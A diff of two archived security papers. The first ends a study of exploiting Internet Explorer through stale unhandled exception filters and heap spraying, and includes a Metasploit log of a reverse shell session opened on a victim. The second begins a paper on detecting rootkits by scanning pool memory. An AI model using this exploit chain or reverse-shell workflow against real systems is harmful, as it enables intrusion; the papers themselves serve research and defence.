it's not impossible. Many 3rd party COM DLLs, however, are compiled
|
||||
with a default load address of 0x00400000, thus making them perfect
|
||||
candidates for this technique. Another thing to keep in mind is that
|
||||
the preferred load address of a DLL is just that: preferred. If two
|
||||
DLLs have the same preferred load address, or their mappings would
|
||||
overlap, then obviously one would be relocated to a new location,
|
||||
typically at a lower address close to the heap, when it is loaded. By
|
||||
keeping this fact in mind, it may be possible to load DLLs that overlap,
|
||||
forcing relocation of a DLL that sets a UEF that would otherwise be
|
||||
loaded at a higher address.
|
||||
|
||||
It is also very important to note that a COM object does not have to be
|
||||
successfully instantiated for the DLL associated with it to be loaded
|
||||
into memory. This is because in order for Internet Explorer to
|
||||
determine whether or not the COM class can be created and is compatible
|
||||
with one that may be used from Internet Explorer, it must load and query
|
||||
various COM interfaces associated with the COM class. This fact is very
|
||||
useful because it means that any DLL that hosts a COM object can be used
|
||||
--- not just ones that host COM objects that can be successfully
|
||||
instantiated from Internet Explorer.
|
||||
|
||||
The culmination of all of these facts is a functional proof of concept
|
||||
exploit for Windows XP SP2 and the latest version of Internet Explorer
|
||||
with all patches applied prior to MS06-051. Its one requirement is that
|
||||
the target have Adobe Acrobat installed. Alternatively, other 3rd party
|
||||
(or even MS provided) DLLs can be used so long as they can be feasibly
|
||||
reached with heap-spraying techniques. Technically speaking, this proof
|
||||
of concept exploits a NULL pointer dereference to gain arbitrary code
|
||||
execution. It has been implemented as an exploit module for the 3.0
|
||||
version of the Metasploit Framework.
|
||||
|
||||
The following example shows this proof of concept in action:
|
||||
|
||||
|
||||
msf exploit(windows/browser/ie_unexpfilt_poc) > exploit
|
||||
[*] Started reverse handler
|
||||
[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0
|
||||
[*] Server started.
|
||||
[*] Exploit running as background job.
|
||||
msf exploit(windows/browser/ie_unexpfilt_poc) >
|
||||
[*] Sending stage (474 bytes)
|
||||
[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059)
|
||||
|
||||
msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
Microsoft Windows XP [Version 5.1.2600]
|
||||
(C) Copyright 1985-2001 Microsoft Corp.
|
||||
|
||||
C:\Documents and Settings\mmiller\Desktop>
|
||||
|
||||
|
||||
6) Mitigation Techniques
|
||||
|
||||
In the interest of not presenting a problem without a solution, the authors
|
||||
have devised a few different approaches that might be taken by Microsoft to
|
||||
solve this issue. Prior to identifying the solution, it is important to
|
||||
summarize the root of the problem. In this case, the authors feel that the
|
||||
problem at hand is rooted around a design flaw with the way the unhandled
|
||||
exception filter ``chain'' is maintained. In particular, the ``chain''
|
||||
management is an implicit thing which hinges on the symmetric registering and
|
||||
deregistering of unhandled exception filters. In order to solve this design
|
||||
problem, some mechanism must be put in place that will eliminate the
|
||||
symmetrical requirement. Alternatively, the symmetrical requirement could be
|
||||
retained so long as something ensured that operations never occurred out of
|
||||
order. The authors feel that this latter approach is more complicated and
|
||||
potentially not feasible. The following sections will describe a few different
|
||||
approaches that might be used or considered to solve this issue.
|
||||
|
||||
Aside from architecting a more robust implementation, this attack vector may
|
||||
also be mitigated through conventional exploitation counter-measures, such as
|
||||
NX and ASLR.
|
||||
|
||||
|
||||
6.1) Behavioral Change to SetUnhandledExceptionFilter
|
||||
|
||||
One way in which Microsoft could solve this issue would be to change the
|
||||
behavior of kernel32!SetUnhandledExceptionFilter in a manner that allows it to
|
||||
support true registration and deregistration operations rather than implicit
|
||||
ones. This can be accomplished by making it possible for the function to
|
||||
determine whether a register operation is occurring or whether a deregister
|
||||
operation is occurring.
|
||||
|
||||
Under this model, when a registration operation occurs,
|
||||
kernel32!SetUnhandledExceptionFilter can return a dynamically generated context
|
||||
that merely calls the routine that is previous to the one that was registered.
|
||||
The fact that the context is dynamically generated makes it possible for the
|
||||
function to distinguish between registrations and deregistrations. When the
|
||||
function is called with a dynamically generated context, it can assume that a
|
||||
deregistration operation is occurring. Otherwise, it must assume that a
|
||||
registration operation is occurring.
|
||||
|
||||
To ensure that the underlying list of registered UEFs is not corrupted,
|
||||
kernel32!SetUnhandledExceptionFilter can be modified to ensure that when a
|
||||
deregistration operation occurs, any dynamically generated contexts that
|
||||
reference the routine being deregistered can be updated to call to the
|
||||
next-previous routine, if any, or simply return if there is no longer a
|
||||
previous routine.
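
To illustrate why explicit bookkeeping removes the symmetry
requirement, here is a deliberately simplified portable C sketch. It
does not implement the dynamically generated contexts proposed above.
Instead it assumes a plain array of registered filters, with the
hypothetical names model_register, model_deregister and
model_top_level, and filters modeled as nonzero integer tags.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_MAX_FILTERS 8

/* Filters are modeled as integer tags; 0 means "no filter". */
static int model_filters[MODEL_MAX_FILTERS];
static size_t model_count;

/* Explicit registration: append to the list. Returns 1 on success. */
int model_register(int filter)
{
    assert(filter != 0);
    if (model_count == MODEL_MAX_FILTERS)
        return 0;
    model_filters[model_count++] = filter;
    return 1;
}

/* Explicit deregistration: remove the entry wherever it sits, so the
 * order of deregistration no longer matters. Returns 1 if found. */
int model_deregister(int filter)
{
    size_t i, j;

    for (i = 0; i < model_count; i++) {
        if (model_filters[i] == filter) {
            for (j = i + 1; j < model_count; j++)
                model_filters[j - 1] = model_filters[j];
            model_count--;
            return 1;
        }
    }
    return 0;
}

/* The top-level filter is the most recent entry still registered. */
int model_top_level(void)
{
    return model_count ? model_filters[model_count - 1] : 0;
}
```

With this bookkeeping, registering F and G and then deregistering F
first leaves G on top, and deregistering G afterwards leaves no filter
at all. The stale F never becomes the top-level filter again.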
|
||||
|
||||
|
||||
6.2) Prevent Setting of non-image UEF
|
||||
|
||||
One approach that could be used to solve this issue for the general case is the
|
||||
modification of kernel32!SetUnhandledExceptionFilter to ensure that the
|
||||
function pointer being passed in is associated with an image region. By adding
|
||||
this check at the time this function is called, the attack vector described in
|
||||
this document can be mitigated. However, doing it in this manner may have
|
||||
negative implications for backward compatibility. For instance, there are
|
||||
likely to be cases where this scenario happens completely legitimately without
|
||||
malicious intent. If a check like this were to be added, a once-working
|
||||
application would begin to fail due to the added security checks. This is not
|
||||
an unlikely scenario. Just because an unhandled exception filter is invalid
|
||||
doesn't mean that it will eventually cause the application to crash because it
|
||||
may, in fact, never be executed.
|
||||
|
||||
|
||||
6.3) Prevent Execution of non-image UEF
|
||||
|
||||
Like preventing the setting of a non-image UEF, it may also be
|
||||
possible to modify kernel32!UnhandledExceptionFilter to prevent execution of
|
||||
the top-level UEF if it points to a non-image region. While this seems like it
|
||||
would be a useful check and should solve the issue, the fact is that it does
|
||||
not. Consider the scenario where a top-level UEF is set to an invalid address
|
||||
due to asymmetric deregistration. Following that, the top-level UEF is set to
|
||||
a new value which is the location of a valid function. After this point, if an
|
||||
unhandled exception is dispatched, kernel32!UnhandledExceptionFilter will see
|
||||
that the top-level UEF points to a valid image region and as such will call it.
|
||||
However, the top-level UEF may be implemented in such a way that it will pass
|
||||
exceptions that it cannot handle onto the previously registered top-level UEF.
|
||||
When this occurs, the invalid UEF is called which may point to arbitrary code
|
||||
at the time that it's executed. The fact that
|
||||
kernel32!UnhandledExceptionFilter can filter non-image regions does not solve
|
||||
the fact that uncontrolled UEFs may pass exceptions on up the chain.
|
||||
|
||||
|
||||
7) Future Research
|
||||
|
||||
With the technique identified for being able to control the top-level UEF by
|
||||
taking advantage of asymmetric deregistration, future research can begin to
|
||||
identify better ways in which to accomplish this. For instance, rather than
|
||||
relying on child windows in Internet Explorer, there may be another vector
|
||||
through which ole32!CoFreeUnusedLibrariesEx can be called to cause the
|
||||
asymmetric deregistration to occur. By default, ole32!CoFreeUnusedLibrariesEx is
|
||||
called every ten minutes, but this fact is not particularly useful in terms of
|
||||
general exploitation. There may also be better and more refined techniques that
|
||||
can be used to more accurately spray the heap in order to place arbitrary code
|
||||
at the location that a defunct top-level UEF resided at.
|
||||
|
||||
Aside from improving the technique itself, it is also prudent to consider other
|
||||
software applications that could be affected by this. In most cases, this
|
||||
technique will not be feasible due to an attacker's inability to control the
|
||||
loading and unloading of DLLs. However, should a mechanism for accomplishing
|
||||
this be exposed, it may indeed be possible to take advantage of this.
|
||||
|
||||
One such target software application that the authors find most intriguing
|
||||
would be IIS. If it were possible for a remote attacker to cause DLLs that use
|
||||
UEFs to be loaded and unloaded in a particular order, such as by accessing
|
||||
websites that load COM objects, then it may be possible for an attacker to
|
||||
leverage this vector on a remote webserver. At the time of this writing, the
|
||||
only approach that the authors are aware of that could permit this relies on remote
|
||||
debugging features present in ASP.NET that allow for the instantiation of COM
|
||||
objects that are placed in a specific allow list. This isn't a very common
|
||||
configuration, and is also limited by which COM objects can be instantiated,
|
||||
thus making it not particularly feasible. However, it is thought that other,
|
||||
more feasible techniques may exist to accomplish this.
|
||||
|
||||
Aside from IIS, the authors are also of the opinion that this attack vector
|
||||
could be applied to many of the Microsoft Office applications, such as Excel
|
||||
and Word. These suites are thought to be vulnerable due to the fact that they
|
||||
permit the instantiation and embedding of arbitrary COM objects in the document
|
||||
files. If it were possible to come up with a way to control the loading and
|
||||
unloading of DLLs through these instantiations, it may be possible to take
|
||||
advantage of the flaw outlined in this paper. One particular way in which this
|
||||
may be possible is through the use of macros, but this has a lesser severity
|
||||
because it would require some form of user interaction to permit the execution
|
||||
of macros.
|
||||
|
||||
Another interesting application that may be susceptible to this attack is
|
||||
Microsoft SQL Server. Because SQL Server has features that permit
|
||||
the loading and unloading of DLLs, it may be possible to leverage a SQL
|
||||
injection attack in a way that makes it possible to gain control of the
|
||||
top-level UEF by causing certain DLLs to be loaded and unloaded. However, given
|
||||
the ability to load DLLs, there are likely to be other techniques that can be
|
||||
used to gain code execution as well. Once that occurs, a large query with
|
||||
predictable results could be used as a mechanism to spray the heap. This type
|
||||
of attack could even be accomplished through something as innocuous as a
|
||||
website that is merely backed against the SQL server. Remember, attack vectors
|
||||
aren't always direct.
|
||||
|
||||
|
||||
8) Conclusion
|
||||
|
||||
The title of this paper implies that an attacker has the ability to leverage
|
||||
code execution of bugs that would otherwise not be useful, such as NULL pointer
|
||||
dereferences. To that point, this paper has illustrated a technique that can
|
||||
be used to gain control of the top-level unhandled exception filter for an
|
||||
application by making the registration and deregistration process asymmetrical.
|
||||
Once the top-level UEF has been made to point to invalid memory, an attacker
|
||||
can use techniques like heap-spraying to attempt to place attacker controlled
|
||||
code at the location that the now-defunct top-level UEF resided at. Assuming
|
||||
this can be accomplished, an attacker simply needs to be able to trigger an
|
||||
unhandled exception to cause the execution of arbitrary code.
|
||||
|
||||
The crux of this attack vector is in leveraging a design flaw in the
|
||||
assumptions made by the way the unhandled exception filter ``chain'' is
|
||||
maintained. In particular, the design assumes that calls made to register, and
|
||||
subsequently deregister, an unhandled exception filter through
|
||||
kernel32!SetUnhandledExceptionFilter will be done symmetrically. However, this
|
||||
cannot always be controlled, as DLLs that register unhandled exception filters
|
||||
are not always guaranteed to be loaded and unloaded in a symmetric fashion. If
|
||||
an attacker is capable of controlling the order in which DLLs are loaded and
|
||||
unloaded, then they may be capable of gaining arbitrary code execution through
|
||||
this technique, such as was illustrated in the Internet Explorer case study in
|
||||
chapter .
|
||||
|
||||
While not feasible in most cases, this technique has been proven to work in at
|
||||
least one critical application: Internet Explorer. Going forward, other
|
||||
applications, such as IIS, may also be found to be susceptible to this attack
|
||||
vector. All it will take is a little creativity and the right set of
|
||||
conditions.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
[1] Conover, Matt and Oded Horovitz. Reliable Windows Heap Exploits.
|
||||
http://cansecwest.com/csw04/csw04-Oded+Connover.ppt; accessed
|
||||
May 6, 2006.
|
||||
|
||||
|
||||
[2] Kazienko, Przemyslaw and Piotr Dorosz. Hacking an SQL Server.
|
||||
http://www.windowsecurity.com/articles/HackinganSQLServer.html;
|
||||
accessed May 7, 2006.
|
||||
|
||||
|
||||
[3] Litchfield, David. Windows Heap Overflows.
|
||||
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt;
|
||||
accessed May 6, 2006.
|
||||
|
||||
|
||||
[4] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
|
||||
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx;
|
||||
accessed May 6, 2006.
|
||||
|
||||
|
||||
[5] Microsoft Corporation. UnhandledExceptionFilter.
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/unhandledexceptionfilter.asp;
|
||||
accessed May 6, 2006.
|
||||
|
||||
|
||||
[6] Microsoft Corporation. SetUnhandledExceptionFilter.
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/setunhandledexceptionfilter.asp;
|
||||
accessed May 6, 2006.
|
||||
|
||||
[7] Murphy, Matthew. Windows Media Player Plug-In Embed Overflow.
|
||||
http://www.milw0rm.com/exploits/1505; accessed May
|
||||
7, 2006.
|
||||
|
||||
|
||||
[8] SkyLined. InternetExploiter.
|
||||
http://www.edup.tudelft.nl/~bjwever/exploits/InternetExploiter2.zip;
|
||||
accessed May 7, 2006.
|
1004
uninformed/4.6.txt
Normal file
File diff suppressed because it is too large
Load diff
821
uninformed/4.7.txt
Normal file
|
@ -0,0 +1,821 @@
|
|||
GREPEXEC: Grepping Executive Objects from Pool Memory
|
||||
bugcheck
|
||||
chris@bugcheck.org
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract:
|
||||
|
||||
As rootkits continue to evolve and become more advanced, methods that can be
|
||||
used to detect hidden objects must also evolve. For example, relying on system
|
||||
provided APIs to enumerate maintained lists is no longer enough to provide
|
||||
effective cross-view detection. To that point, scanning virtual memory for
|
||||
object signatures has been shown to provide useful, but limited, results. The
|
||||
following paper outlines the theory and practice behind scanning memory for
|
||||
hidden objects. This method relies upon the ability to safely reference the
|
||||
Windows system virtual address space and also depends upon building and
|
||||
locating effective memory signatures. Using this method as a base, suggestions
|
||||
are made as to what actions might be performed once objects are detected. The
|
||||
paper also provides a simple example of how object-independent signatures can be
|
||||
built and used to detect several different kernel objects on all versions of
|
||||
Windows NT+. Due to time constraints, the source code associated with this
|
||||
paper will be made publicly available in the near future.
|
||||
|
||||
Thanks:
|
||||
|
||||
Thanks to skape, Peter, and the rest of the uninformed hooligans;
|
||||
you guys and gals rock!
|
||||
|
||||
Disclaimer:
|
||||
|
||||
The author is not responsible for how the paper's contents are used
|
||||
or interpreted. Some information may be inaccurate or incorrect. If
|
||||
the reader feels any information is incorrect or has not been
|
||||
properly credited please contact the author so corrections can be
|
||||
made. All content refers to the Windows XP Service Pack 2
|
||||
platform unless otherwise noted.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
As rootkits become increasingly popular and more sophisticated than
|
||||
ever before, detection methods must also evolve. While rootkit
|
||||
technologies have evolved beyond API hooking methods, detectors have
|
||||
also evolved beyond the hook detection ages. At first,
|
||||
rootkits such as FU were detected by applications such as
|
||||
Blacklight, using various methods which exploited FU's weak,
|
||||
proof-of-concept design. These specific weaknesses were
|
||||
addressed in FUTo. However, some still remain, even setting aside
|
||||
the topic of this paper.
|
||||
|
||||
RAIDE, a rootkit detection tool, uses a memory
|
||||
signature scanning method in order to find EPROCESS blocks hidden by
|
||||
FUTo. This specific implementation works; however, it too has its
|
||||
weaknesses. This paper attempts to outline the general concepts of
|
||||
implementing a successful rootkit detection method using memory
|
||||
signatures.
|
||||
|
||||
The following chapters will discuss how to safely enumerate system
|
||||
memory, what to look for when building a memory signature, what to
|
||||
do once a memory signature has been found, and potential methods of
|
||||
breaking memory signatures. Finally, an accompanying tool will be used
|
||||
to concretely illustrate the subject of this paper.
|
||||
|
||||
After reading the following paper, the reader should have an
|
||||
understanding of the concepts and issues related to kernel object
|
||||
detection using memory signatures. The author believes this to be an
|
||||
acceptable method of rootkit detection. However, as with most things
|
||||
in the security realm, no one technique is the ultimate solution and
|
||||
this technique should only be considered complementary to other known
|
||||
detection methods.
|
||||
|
||||
|
||||
3) Scanning Memory
|
||||
|
||||
Enumerating arbitrary system memory is nowhere near a science since
|
||||
its state can change at any time while you are attempting to access
|
||||
it. While this is true, the memory that surrounds kernel executive
|
||||
objects should be fairly consistent. With proper care, memory accesses
|
||||
should be safe and the chance of false positives and negatives should be
|
||||
fairly minimal. The following sections will outline a safe method to
|
||||
enumerate the contents of both the system's PagedPool and
|
||||
NonPagedPool.
|
||||
|
||||
3.1) Retrieving Pool Ranges
|
||||
|
||||
For the purpose of enumerating pool memory it is unnecessary to
|
||||
enumerate the entire system address space. The system maintains a
|
||||
few global variables such as nt!MmPagedPoolStart,
|
||||
nt!MmPagedPoolEnd and related NonPagedPool
|
||||
variables that can be used in order to speed up a search and reduce
|
||||
the possibility of unnecessary false positives. Although these
|
||||
global variables are not exported, there are a couple of ways in which
|
||||
they can be obtained.
|
||||
|
||||
The most reliable method on modern systems (Windows XP Service Pack 2
|
||||
and up) is through the use of the KPCR->KdVersionBlock pointer located
|
||||
at fs:[0x34]. This points to a KDDEBUGGER_DATA64 structure which is
|
||||
defined in the Debugging Tools For Windows SDK header file wdbgexts.h.
|
||||
This structure is commonly used by malicious software in order to gain
|
||||
access to non-exported global variables to manipulate the system.
|
||||
|
||||
A second method to obtain PagedPool values is to reference the
|
||||
per-session nt!_MM_SESSION_SPACE found at EPROCESS->Session. This contains
|
||||
information about the session owning the process, including its ranges
|
||||
and many other PagedPool related values shown here.
|
||||
|
||||
kd> dt nt!_MM_SESSION_SPACE
|
||||
+0x01c NonPagedPoolBytes : Uint4B
|
||||
+0x020 PagedPoolBytes : Uint4B
|
||||
+0x024 NonPagedPoolAllocations : Uint4B
|
||||
+0x028 PagedPoolAllocations : Uint4B
|
||||
+0x044 PagedPoolMutex : _FAST_MUTEX
|
||||
+0x064 PagedPoolStart : Ptr32 Void
|
||||
+0x068 PagedPoolEnd : Ptr32 Void
|
||||
+0x06c PagedPoolBasePde : Ptr32 _MMPTE
|
||||
+0x070 PagedPoolInfo : _MM_PAGED_POOL_INFO
|
||||
+0x244 PagedPool : _POOL_DESCRIPTOR
|
||||
|
||||
While enumerating the entire system address space is not preferable, it
|
||||
can still be used in situations where pool information cannot be
|
||||
obtained. The start of the system address space can be assumed to be
|
||||
any address above nt!MmHighestUserAddress. However, it would appear
|
||||
that an even safer assumption would be the address following the
|
||||
LARGE_PAGE where ntoskrnl.exe and hal.dll are mapped. This can be
|
||||
obtained by using any address exported by hal.dll and rounding up to the
|
||||
nearest large page.
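
As a small worked example of the rounding step above, the following sketch
rounds a 32-bit address up to the next large-page boundary. The large-page
sizes (4 MB without PAE, 2 MB with PAE) and the function name are assumptions
made for illustration; the address used with it would be that of any hal.dll
export.

```c
#include <stdint.h>

/* Assumed large-page sizes on 32-bit x86: 4 MB without PAE, 2 MB with PAE. */
#define LARGE_PAGE_SIZE_NON_PAE 0x400000u
#define LARGE_PAGE_SIZE_PAE     0x200000u

/* Round addr up to the next multiple of large_page_size, which must be a
   power of two. An address that is already aligned is returned unchanged.
   Addresses within one large page of 0xFFFFFFFF wrap around to 0. */
uint32_t round_up_to_large_page(uint32_t addr, uint32_t large_page_size)
{
    return (addr + large_page_size - 1) & ~(large_page_size - 1);
}
```

For instance, a hypothetical export at 0x806d0000 rounds up to 0x80800000
with either page size.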
|
||||
|
||||
|
||||
3.2) Locking Memory
|
||||
|
||||
When accessing arbitrary memory locations, it is important that pages be
|
||||
locked in memory prior to accessing them. This is done to ensure that
|
||||
accessing the page can be done safely and will not cause an exception
|
||||
due to a race condition, such as if it were to be de-allocated between a
|
||||
check and a reference. The system provides a routine to lock pages
|
||||
named nt!MmProbeAndLockPages. This routine can be used to lock either
|
||||
pageable or non-paged memory. Since physical pages maintain a reference
|
||||
count in the nt!MmPfnDatabase there is no worry of an outside source
|
||||
unlocking the pages and having them page out to disk or become invalid.
|
||||
|
||||
In order to use MmProbeAndLockPages, a caller must first build an MDL
|
||||
structure using something such as nt!IoAllocateMdl or
|
||||
nt!MmInitializeMdl. The MDL creation routines are passed a virtual
|
||||
address and length describing the block of virtual memory to be
|
||||
referenced. On a successful call to nt!MmProbeAndLockPages, the virtual
|
||||
address range described by the MDL structure is safe to access. Once the
|
||||
block no longer needs to be accessed, the pages must be unlocked
|
||||
using nt!MmUnlockPages.
|
||||
|
||||
A trick can be used to further reduce the number of pages locked when
|
||||
enumerating the NonPagedPool. As documented, MmProbeAndLockPages can be
|
||||
called at DISPATCH_LEVEL with the limitation of it only being allowed to
|
||||
lock resident memory pages and failing otherwise, which is a desirable
|
||||
side-effect in this case.
|
||||
|
||||
|
||||
4) Detecting Executive Objects
|
||||
|
||||
In general, all of the executive components of the NT kernel rely on the
|
||||
object manager in order to manage the objects they allocate. All objects
|
||||
allocated by the object manager have a common header named OBJECT_HEADER
|
||||
and additional optional headers such as OBJECT_HEADER_NAME_INFO, process
|
||||
quota information, and handle trace information. Let's take a look to
|
||||
see what is common to all executive objects and how we can use the pool
|
||||
block header information to identify an allocated executive object.
|
||||
Lastly, some object specific information will be discussed in terms of
|
||||
generating a useful memory signature for an object.
|
||||
|
||||
4.1) Generic Object Information
|
||||
|
||||
Since the OBJECT_HEADER is common to all objects, let's look at it in
|
||||
detail. A static field here refers to all objects of a specific type, not
|
||||
all executive objects in the system.
|
||||
|
||||
kd> dt _OBJECT_HEADER
|
||||
+0x000 PointerCount : Int4B
|
||||
+0x004 HandleCount : Int4B
|
||||
+0x004 NextToFree : Ptr32 Void
|
||||
+0x008 Type : Ptr32 _OBJECT_TYPE
|
||||
+0x00c NameInfoOffset : UChar
|
||||
+0x00d HandleInfoOffset : UChar
|
||||
+0x00e QuotaInfoOffset : UChar
|
||||
+0x00f Flags : UChar
|
||||
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
|
||||
+0x010 QuotaBlockCharged : Ptr32 Void
|
||||
+0x014 SecurityDescriptor : Ptr32 Void
|
||||
+0x018 Body : _QUAD
|
||||
|
||||
-------------------+------------+-------------------------------------
|
||||
PointerCount | Variable | Number of references
|
||||
HandleCount | Variable | Number of open handles
|
||||
NextToFree | NotValid | Used when freed
|
||||
Type | Static | Pointer to OBJECT_TYPE
|
||||
NameInfoOffset | Static | 0 or offset to related header
|
||||
HandleInfoOffset | Static | 0 or offset to related header
|
||||
QuotaInfoOffset | Static | 0 or offset to related header
|
||||
Flags | NotCertain | Not certain
|
||||
ObjectCreateInfo | Variable | Pointer to OBJECT_CREATE_INFORMATION
|
||||
QuotaBlockCharged | NotCertain | Not certain
|
||||
SecurityDescriptor | Variable | Pointer to SECURITY_DESCRIPTOR
|
||||
Body | NotValid | Union with the actual object
|
||||
-------------------+------------+-------------------------------------
|
||||
|
||||
From this it is assumed that the most reliable and unique signature is
|
||||
the Type field of the OBJECT_HEADER which could be used in order to
|
||||
identify objects of a specific type such as EPROCESS, ETHREAD,
|
||||
DRIVER_OBJECT, and DEVICE_OBJECT objects.
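
A minimal sketch of a Type-based scan follows, assuming the 32-bit XP SP2
layout dumped above and a buffer that has already been copied out of pool
memory. The struct and function names are hypothetical, the 8-byte stride is
an assumption based on the pool alignment, and the reference count checks are
an extra sanity test added here, not part of the signature described in the
text.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 32-bit XP SP2 OBJECT_HEADER layout, with pointers held as uint32_t. */
struct object_header32 {
    int32_t  pointer_count;
    int32_t  handle_count;        /* unioned with NextToFree */
    uint32_t type;                /* pointer to the OBJECT_TYPE */
    uint8_t  name_info_offset;
    uint8_t  handle_info_offset;
    uint8_t  quota_info_offset;
    uint8_t  flags;
    uint32_t object_create_info;  /* unioned with QuotaBlockCharged */
    uint32_t security_descriptor;
};  /* 0x18 bytes; the object body follows */

/* Return the offset of the first 8-byte-aligned candidate header at or after
   start whose Type equals wanted_type, or -1 if none is found. */
long find_object_header(const uint8_t *buf, size_t len, size_t start,
                        uint32_t wanted_type)
{
    struct object_header32 hdr;
    size_t off = (start + 7) & ~(size_t)7;

    for (; off + sizeof hdr <= len; off += 8) {
        memcpy(&hdr, buf + off, sizeof hdr);  /* avoids unaligned access */
        if (hdr.type == wanted_type &&
            hdr.pointer_count > 0 && hdr.handle_count >= 0)
            return (long)off;
    }
    return -1;
}
```

The wanted_type value would be the address of the OBJECT_TYPE for the object
class of interest, for example the value stored in nt!PsProcessType.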
|
||||
|
||||
|
||||
4.2) Validating Pool Block Information
|
||||
|
||||
Kernel pool management appears to be slightly different from usermode
|
||||
heap management. However, if one assumes that the only concern is
|
||||
dealing with pool memory allocations which are less than PAGE_SIZE, it is
|
||||
fairly similar. Each call to ExAllocatePoolWithTag() returns a
|
||||
buffer preceded by the following header:
|
||||
|
||||
kd> dt _POOL_HEADER
|
||||
+0x000 PreviousSize : Pos 0, 9 Bits
|
||||
+0x000 PoolIndex : Pos 9, 7 Bits
|
||||
+0x002 BlockSize : Pos 0, 9 Bits
|
||||
+0x002 PoolType : Pos 9, 7 Bits
|
||||
+0x000 Ulong1 : Uint4B
|
||||
+0x004 ProcessBilled : Ptr32 _EPROCESS
|
||||
+0x004 PoolTag : Uint4B
|
||||
+0x004 AllocatorBackTraceIndex : Uint2B
|
||||
+0x006 PoolTagHash : Uint2B
|
||||
|
||||
For the purposes of locating objects, the following is a breakdown of
|
||||
what could be useful. Again, static refers to fields common between similar
|
||||
executive objects and not all allocated POOL_HEADER structures.
|
||||
|
||||
|
||||
------------------------+------------+----------------------------------
|
||||
PreviousSize | Variable | Offset to previous pool block
|
||||
PoolIndex | NotCertain | Not certain
|
||||
BlockSize | Static | Size of pool block
|
||||
PoolType | Static | POOL_TYPE
|
||||
Ulong1 | Union | Padding, not valid
|
||||
ProcessBilled | Variable | Allocator EPROCESS when no Tag specified
|
||||
PoolTag | Static | Pool Tag (ULONG)
|
||||
AllocatorBackTraceIndex | NotCertain | Not certain
|
||||
PoolTagHash | NotCertain | Not certain
|
||||
------------------------+------------+----------------------------------
|
||||
|
||||
The POOL_HEADER contains several fields that appear to be common to similar
|
||||
objects which could be used to further verify the likelihood of
|
||||
locating an object of a specific type such as BlockSize, PoolType, and
|
||||
PoolTag.
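
To make the bit layout concrete, the following sketch decodes the 8-byte,
32-bit POOL_HEADER shown above from raw little-endian bytes and compares the
three static fields against expected values. The struct and function names
are hypothetical, and the expected values for a given object type would have
to be measured on the target system.

```c
#include <stdint.h>

struct pool_header_info {
    unsigned previous_size;  /* in 8-byte units */
    unsigned pool_index;
    unsigned block_size;     /* in 8-byte units */
    unsigned pool_type;
    uint32_t pool_tag;
};

/* Decode the 8-byte, 32-bit XP SP2 POOL_HEADER found at p (little-endian). */
struct pool_header_info decode_pool_header(const uint8_t *p)
{
    struct pool_header_info out;
    uint16_t w0 = (uint16_t)(p[0] | (p[1] << 8));
    uint16_t w1 = (uint16_t)(p[2] | (p[3] << 8));

    out.previous_size = w0 & 0x1FF;         /* bits 0..8  */
    out.pool_index    = (w0 >> 9) & 0x7F;   /* bits 9..15 */
    out.block_size    = w1 & 0x1FF;         /* bits 0..8  */
    out.pool_type     = (w1 >> 9) & 0x7F;   /* bits 9..15 */
    out.pool_tag = (uint32_t)p[4] | ((uint32_t)p[5] << 8) |
                   ((uint32_t)p[6] << 16) | ((uint32_t)p[7] << 24);
    return out;
}

/* Compare the static fields against the values expected for one object type. */
int pool_header_matches(const struct pool_header_info *h, unsigned block_size,
                        unsigned pool_type, uint32_t pool_tag)
{
    return h->block_size == block_size &&
           h->pool_type == pool_type &&
           h->pool_tag == pool_tag;
}
```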
|
||||
|
||||
In addition to the mentioned static fields, two other fields,
|
||||
PreviousSize and BlockSize, can be used to validate that the currently
|
||||
assumed POOL_HEADER appears to be a valid, allocated pool block and is in
|
||||
one of the pool manager's maintained linked lists. PreviousSize and
|
||||
BlockSize are expressed in units of the minimum pool alignment, which is 8 bytes
|
||||
on a 32-bit system and 16 bytes on a 64-bit system. Scaled by that unit, these two elements supply the byte offsets to the
|
||||
neighboring pool blocks.
|
||||
|
||||
If PreviousSize equals 0, the current POOL_HEADER should be the first
|
||||
pool block in the pool's contiguous allocations. If it is not, it
|
||||
should be the same as the previous POOL_HEADER's BlockSize. The
|
||||
BlockSize should never equal 0 and should always be the same as the
|
||||
following POOL_HEADER's PreviousSize.
|
||||
|
||||
The following code validates a POOL_HEADER of an allocated pool block.
|
||||
|
||||
//
|
||||
// Assumes BlockOffset < PAGE_SIZE
|
||||
// ASSERTS Flink == Flink->Blink && Blink == Blink->Flink
|
||||
//
|
||||
BOOLEAN ValidatePoolBlock (
|
||||
IN PPOOL_HEADER pPoolHdr,
|
||||
IN VALIDATE_ADDR pValidator
|
||||
) {
|
||||
BOOLEAN bReturn = FALSE;
|
||||
|
||||
PPOOL_HEADER pPrev;
|
||||
PPOOL_HEADER pNext;
|
||||
|
||||
pPrev = (PPOOL_HEADER)((PUCHAR)pPoolHdr
|
||||
- (pPoolHdr->PreviousSize * sizeof(POOL_HEADER)));
|
||||
pNext = (PPOOL_HEADER)((PUCHAR)pPoolHdr
|
||||
+ (pPoolHdr->BlockSize * sizeof(POOL_HEADER)));
|
||||
|
||||
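// Next block: BlockSize must be non-zero and must agree with the
|
||||
// following header's PreviousSize.
|
||||
if
|
||||
((
|
||||
( pPoolHdr != pNext )
|
||||
&&( pValidator( (PVOID)((PUCHAR)pNext + sizeof(POOL_HEADER) - 1) )
|
||||
&& pPoolHdr->BlockSize == pNext->PreviousSize )
|
||||
)
|
||||
&&
|
||||
(
|
||||
// Previous block: either this is the first block (PreviousSize == 0)
|
||||
// or the preceding header's BlockSize must agree.
|
||||
( pPoolHdr == pPrev )
|
||||
||( pValidator( pPrev )
|
||||
&& pPoolHdr->PreviousSize == pPrev->BlockSize )
|
||||
))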
|
||||
{
|
